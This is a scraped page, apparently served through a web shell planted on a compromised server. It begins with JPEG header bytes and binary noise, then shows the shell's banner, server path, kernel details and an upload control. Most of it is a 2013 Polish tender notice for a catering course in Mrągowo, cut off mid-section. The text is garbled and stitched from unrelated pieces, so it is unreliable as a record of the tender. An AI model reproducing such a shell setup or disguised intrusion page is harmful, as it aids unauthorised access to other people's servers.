JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131108/457684-N-2013.html

<p class="kh_header"><b>Mrągowo: Kurs Pracownik małej gastronomii z językiem niemieckim</b><br>
<b>Numer ogłoszenia: 457684 - 2013; data zamieszczenia: 08.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Mrągowie , ul. Kopernika 1, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 089 7433500, faks 089 7433501.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupmragowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kurs Pracownik małej gastronomii z językiem niemieckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest organizacja i przeprowadzenie usługi szkoleniowej p.n.: Pracownik małej gastronomii z językiem niemieckim realizowanej w ramach projektu Młodzi nasza przyszłość! współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki Priorytet VI: Rynek pracy otwarty dla wszystkich, Działanie 6.1: Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.1: Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy. 
2.	 Kod CPV: 80530000-8 /Usługi szkolenia zawodowego/.
3.	Cel Kursu : teoretyczne i praktyczne przygotowanie uczestników kursu do pracy w zakładach małej gastronomii na stanowiskach pomocnika kucharza, kucharza oraz obsługi klienta.
4.	Program i warunki realizacji szkolenia: 
4.1.	Liczba godzin dydaktycznych na osobę:  300.
4.2.	 Program szkolenia powinien być zgodny z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14.09.2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy  (Dz.U. Nr 177 z 2010 r., poz. 1193) oraz powinien być opracowany w oparciu o opis zawodu: Kucharz małej gastronomii ujętym w  Krajowym  Standardzie Kwalifikacji Zawodowych opracowanym przez Ministerstwo Pracy i Polityki Społecznej /poz.klasyf. 512002/. i obejmować:
4.2.1.	Teoria zawodu /32 h/ zawierająca zagadnienia:
- obliczanie wartości energetycznej i odżywczej produktów spożywczych i potraw;
- dokonywanie jakościowej i organoleptycznej oceny surowców, półproduktów i gotowych potraw;
- dokonywanie oceny produktów i napojów pod względem towaroznawczym i ich przydatności kulinarnej;
- właściwe dobieranie surowców do produkcji potraw i napojów i oszczędne gospodarowanie nimi;
- przygotowywanie podstawowego asortymentu potraw i napojów z surowców i półproduktów spożywczych w oparciu o normy i receptury gastronomiczne zgodnie z odpowiednimi technikami ich sporządzania oraz w zależności od sposobu ich podawania;
- sporządzanie kalkulacji potraw i napojów;
- dokonywanie obróbki wstępnej i cieplnej surowców odpowiednimi narzędziami, maszynami i urządzeniami;
- wykończanie, porcjowanie, dekorowanie i estetyczne wydawanie wykonanych potraw i napojów;
- konserwowanie maszyn i urządzeń;
- stosowanie zasad zabezpieczenia jakości zdrowotnej potraw, utrzymywanie czystości i porządku na stanowisku pracy, przestrzeganie przepisów sanitarnych, bhp, ppoż., HACCP obowiązujących w zakładach żywienia zbiorowego.
-	obsługa klienta w małej gastronomii.
4.2.2.	Warsztaty gastronomiczne (symulacja)- /48 h /
4.2.3.	 Aktywne poszukiwanie pracy - 8 h /2x4 h na rozpoczęcie i zakończenie kursu/
4.2.4.	Kasjer kas fiskalnych /12h - 3x4h/
4.2.5.	Język niemiecki w małej gastronomii - 60 h
4.2.6.	Zajęcia praktyczne u pracodawcy na stanowisku pracy  /140 h/
4.3.	Ilość osób objętych zamówieniem - 12 osób bezrobotnych, uczestników projektu, skierowanych na szkolenie przez Powiatowy Urząd Pracy w Mrągowie.
4.4.	Termin realizacji zamówienia:   
4.4.1.	 Rozpoczęcie kursu: 13 - 21.01.2014 r.. 
4.4.2.	Zakończenie realizacji kursu: do 30.04.2014 r..
4.5.	Miejsce realizacji szkolenia: teoria i warsztaty symulacyjne - Mrągowo, zajęcia praktyczne u pracodawcy - Mrągowo i teren powiatu mrągowskiego.
4.6.	Szkolenie odbywać się powinno w formie kursu, realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu
4.6.1.	godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min oraz przerwę, liczącą średnio 15 minut, gdyż długość przerw może być ustalona w sposób elastyczny. 
4.7.	Godziny dydaktyczne zajęć praktycznych  u pracodawcy powinny być równe godzinom zegarowym, przerwy zgodnie z wymaganiami stanowiska pracy.
4.8.	Zajęcia szkoleniowe realizowane powinny być w formie wykładu, seminarium, pokazu, ćwiczeń lub w innych formach zajęć stosowanych w kształceniu osób dorosłych. 
4.9.	Zajęcia teoretyczne i warsztaty symulacyjne powinny odbywać się w grupie 12 osobowej w godzinach od 8.00 do 17.00.
4.10.	Zajęcia praktyczne u pracodawcy powinny być realizowane w grupach maksymalnie trzyosobowych w godzinach 7.00 - 18.00.
4.11.	Liczba godzin szkolenia na osobę nie może przekroczyć 8 godzin zegarowych dziennie.
4.12.	Zajęcia szkoleniowe powinny być realizowane w układzie dni tygodnia: poniedziałek - piątek, w przypadkach szczególnie uzasadnionych organizacją zajęć praktycznych mogą odbywać się w sobotę (maksymalnie 5 dni w tygodniu). 
4.13.	Kadra dydaktyczna kursu powinna być zgodna z wymaganiami Zamawiającego określonymi w Rozdziale VI A3 SIWZ.
4.14.	Wykonawca, którego oferta zostanie wybrana, zobowiązany jest przed podpisaniem umowy do przygotowania i przedłożenia do zatwierdzenia harmonogramu zajęć szkolenia, który powinien zawierać daty, godziny, miejsce, tematykę i prowadzących zajęcia, zgodnie ze wzorem Załącznika Nr 1 do Umowy Szkoleniowej.
4.15.	Pomieszczenia/miejsca do odbywania szkolenia muszą:
4.15.1.	być przystosowane do liczby słuchaczy przewidzianych do przeszkolenia i spełniać wymogi bhp i ppoż,
4.15.2.	 posiadać zaplecze socjalne i sanitarne zgodnie z przepisami w tym zakresie.
4.15.3.	 być wyposażone w odpowiedni sprzęt i pomoce dydaktyczne, niezbędne do prawidłowej realizacji przedmiotu zamówienia, 
4.15.4.	 Sala wykładowa powinna być wyposażona w pomoce dydaktyczne oraz minimum 12 stanowisk szkoleniowych dla kursantów (biurko z blatem do pisania, krzesło).
4.15.5.	Warsztaty gastronomiczne (symulacyjne) powinny odbywać się w kuchni (pracowni gastronomicznej) wyłączonej w okresie zajęć z bieżącej produkcji (innych zajęć).
4.15.6.	Pracownia gastronomiczna powinna być wyposażona w niezbędne urządzenia gastronomiczne o stanie technicznym zapewniającym odpowiedni poziom szkolenia. 
4.16.	Wykonawca po podpisaniu umowy a przed rozpoczęciem szkolenia zobowiązany jest do:
4.16.1.	 Umieszczenia widocznego logo Unii Europejskiej, logo Kapitał Ludzki Narodowa Strategia Spójności i informacji o projekcie współfinansowanym z Europejskiego Funduszu Społecznego na lokalu szkolenia, w miejscu (sali) prowadzenia zajęć teoretycznych i praktycznych, na dokumentacji i materiałach dydaktycznych związanych z realizacją szkolenia oraz korespondencji dotyczącej w/w szkolenia. 
4.16.2.	Zarejestrowania się w internetowej bazie ofert szkoleniowych dostępnej na stronie internetowej www.inwestycjawkadry.pl, wpisania niezwłocznie po podpisaniu umowy ogłoszenia o realizowanym na podstawie niniejszej umowy szkoleniu i aktualizowania w w/w bazie informacji o tym szkoleniu nie rzadziej niż raz w miesiącu.
4.17.	Wykonawca zapewnia wszelkie niezbędne materiały szkoleniowe i dydaktyczne związane z przeprowadzeniem kursu tj. m.in. produkty żywnościowe na warsztaty symulacyjne (o wartości min.250 zł/os.).
4.18.	Każdy uczestnik szkolenia otrzyma od Wykonawcy niezwłocznie po rozpoczęciu kursu minimum:
4.18.1.	program szkolenia i harmonogram zajęć  
4.18.2.	podręczniki zawodu kucharz małej gastronomii (minimum jeden) obejmujące cały program szkolenia), 
4.18.3.	minimum: 1 zeszyt 80 kart.,  2 długopisy, teczkę sztywną na materiały szkoleniowe, .
4.18.4.	ubranie ochronne (fartuch z logiem projektu, okrycia głowy, rękawice lateksowe wg potrzeb , obuwie ochronne).
4.18.5.	materiały wymienione w pkt 4.16 po przekazaniu za pokwitowaniem przejdą na własność uczestników szkolenia. 
4.19.	Wykonawca zapewnia każdego dnia uczestnikom kursu, w trakcie minimum dwóch (2) przerw w zajęciach teoretycznych i symulacyjnych, poczęstunek (kącik kawowy) proporcjonalnie do ilości osób (ciastka  min. 150 g/dzień na osobę, kawa, herbata,).
4.20.	Wykonawca zobowiązany jest do przeprowadzenia w ostatnim dniu szkolenia ankiet oceniających szkolenie oraz przekazanie ich wraz z analizą  Zamawiającemu.
4.21.	Wykonawca dokona zwrotu kosztów dojazdu na szkolenie uczestników kursu z miejsca zamieszkania do miejsca odbywania szkolenia na warunkach zgodnych z Zasadami zwrotu kosztów przejazdu w ramach projektu Młodzi nasza przyszłość!, będącymi  Załącznikiem Nr 2 do Umowy Szkoleniowej a Zamawiający zrefunduje je na podstawie przedłożonych dokumentów. 
4.22.	Pozostałe warunki realizacji zamówienia określa wzór umowy (Załącznik Nr 9 do SIWZ).
5.	Szkolenie powinno zakończyć się uzyskaniem co najmniej następujących dokumentów i certyfikatów :
5.1.	 Zaświadczeniem  o ukończeniu kursu zgodnym z § 75 pkt 3 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14.09.2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy  (Dz.U. Nr 177 z 2010 r., poz. 1193 z późn.zm.).
5.2.	 Zaświadczenie ukończenia kursu kas fiskalnych. 
5.3.	Certyfikat/zaświadczenie ukończenia kursu z logo i nazwą projektu EFS, w ramach którego jest realizowane szkolenie, zaprojektowany zgodne z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki będącymi załącznikiem do Planu Komunikacji POKL..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Dla uznania, że wykonawca spełnia warunek posiadania uprawnień do organizowania i przeprowadzania szkoleń objętych niniejszym zamówieniem Zamawiający wymaga, aby wykonawca wykazał, że:
1.1.1.	jest instytucją szkoleniową w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2013 r. poz. 674 z późn. zm.), tj. posiada aktualny wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej, co Zamawiający oceni na podstawie oświadczenia załączonego przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.1.	  Dla uznania, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający wymaga od wykonawcy posiadania doświadczenia w realizacji usług szkolenia dorosłych w zakresie objętym zamówieniem. 
2.1.1.	Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie co najmniej jedno takie zamówienie, składając wykaz wykonanych głównych zamówień zgodnie ze wzorem załącznika Nr 8 do SIWZ wraz z załączonymi dowodami, że co najmniej 80 % wymienionych zamówień zostało wykonanych należycie przez załączenie pisemnych poświadczeń, zgodnie z § 1 ust 2 pkt 1 i 3 oraz ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. . w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy  oraz form, w jakich te dokumenty mogą być składane (Dz.U.2013.231).
2.1.2.	W celu potwierdzenia posiadania wymaganego doświadczenia Zamawiający wymaga złożenia wykazu głównych usług szkoleniowych w zakresie przedmiotu zamówienia (grupy szkoleniowe minimum 6-cio osobowe) wykonanych w ostatnich trzech latach, licząc wstecz od dnia upływu terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.1.	Dla uznania, że wykonawca spełnia warunek  dysponowania odpowiednim potencjałem technicznym, Zamawiający wymaga by zamawiający dysponował do realizacji szkolenia:
3.1.1.	co najmniej jedną salą wykładową o powierzchni minimum 30 m2 wyposażoną w pomoce dydaktyczne (tablica, flipchart, itp.) oraz 12 stanowisk szkoleniowych dla kursantów (biurko z blatem do pisania, krzesło), z odrębnym zapleczem socjalnym (szatnia, toaleta, kącik kawowy)
3.1.2.	pracownią do ćwiczeń symulacyjnych wyposażoną w odpowiednią ilość profesjonalnego sprzętu i materiałów (co najmniej cztery stanowiska ćwiczeniowe wyposażone w niezbędny sprzęt gastronomiczny) o powierzchni gwarantującej jednoczesny instruktaż dla całej grupy szkoleniowej.
3.1.3.	Do zajęć z modułu kasjer kas fiskalnych wymagane jest dysponowanie min. 12 egzemplarzami aktualnie spotykanych w handlu kas fiskalnych i salą o powierzchni min. 30 m2 , gwarantujące jednoczesny instruktaż dla całej grupy szkoleniowej.
3.1.4.	Zamawiający wymaga złożenia informacji dotyczącej bazy lokalowej (opisać te sale/miejsca, w których faktycznie będą realizowane zajęcia i z których uczestnicy kursu będą rzeczywiście korzystać z wyszczególnieniem ilości, rodzaju i typu sprzętu, podstawa dysponowania bazą lokalową - pkt 11.4 zał. 2 Program szkolenia do SIWZ + Załącznik  Nr 7b oraz wykazu bazy sprzętowej, jaka będzie wykorzystana na szkoleniu - wzór załącznik nr 6 do SIWZ. Informacja na temat wyposażenia w sprzęt nie dotyczy miejsc stażowych u pracodawców.
3.1.5.	Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że potencjał techniczny szkolenia jest adekwatny do wymagań SIWZ i potrzeb w zakresie wykonywanych zadań w realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania osobami, Zamawiający wymaga by Wykonawca:
3.2.1.	 Wskazał do wykonania niniejszego zamówienia co najmniej:
3.2.1.1.	dwie osoby do prowadzenia zajęć teoretycznych (gastronomicznych) i co najmniej 1 osobę do przeprowadzenia warsztatów gastronomicznych (symulacji)  - wszystkie osoby prowadzące te zajęcia powinny być z wykształceniem wyższym gastronomicznym oraz posiadać doświadczenie (co najmniej jedno wykonane szkolenie osób dorosłych w zakresie przedmiotu zamówienia). 
3.2.1.2.	do nauki języka niemieckiego - jedną osobę - germanistę z wyższym wykształceniem oraz posiadającą doświadczenie (co najmniej jedno wykonane szkolenie osób dorosłych w zakresie prowadzonego przedmiotu). 
3.2.1.3.	jedną osobę do modułu kasjer kas fiskalnych - z wykształceniem  co najmniej średnim, posiadająca kwalifikacje instruktora kas fiskalnych oraz posiadającą doświadczenie (co najmniej jedno wykonane szkolenie w zakresie prowadzonego przedmiotu). 
3.2.1.4.	 jedną osobę prowadzącą moduł: aktywne poszukiwanie pracy - posiadającą wykształcenie wyższe w specjalności doradca zawodowy oraz doświadczenie / co najmniej dwa szkolenia grupowe w zakresie aktywizacji osób bezrobotnych w okresie ostatnich trzech lat/. 
3.2.1.5.	do zajęć praktycznych u pracodawcy powinna być wyznaczona jedna osoba jako opiekun na każdą prowadzoną grupę stażową, posiadająca kwalifikacje merytoryczne zgodne z przedmiotem zamówienia /w tym nadzór nad pracownikami/.
3.2.1.6.	Wykładowcy i instruktorzy (bez opiekunów zajęć praktycznych u pracodawcy) winni posiadać kwalifikacje pedagogiczne.
3.2.2.	W celu wykazania spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający wymaga złożenia wykazu osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, zakresu wykonywania przez nich czynności oraz informacji o podstawie dysponowania tymi osobami - zgodnego ze wzorem załącznika nr 5 do SIWZ. 
3.2.3.	Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że kadra dydaktyczna szkolenia posiada wymagane w SIWZ wykształcenie, kwalifikacje i doświadczenie w zakresie wykonywanych czynności w realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy znajdują się w sytuacji finansowej i ekonomicznej zapewniającej wykonanie zamówienia.
4.2.	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
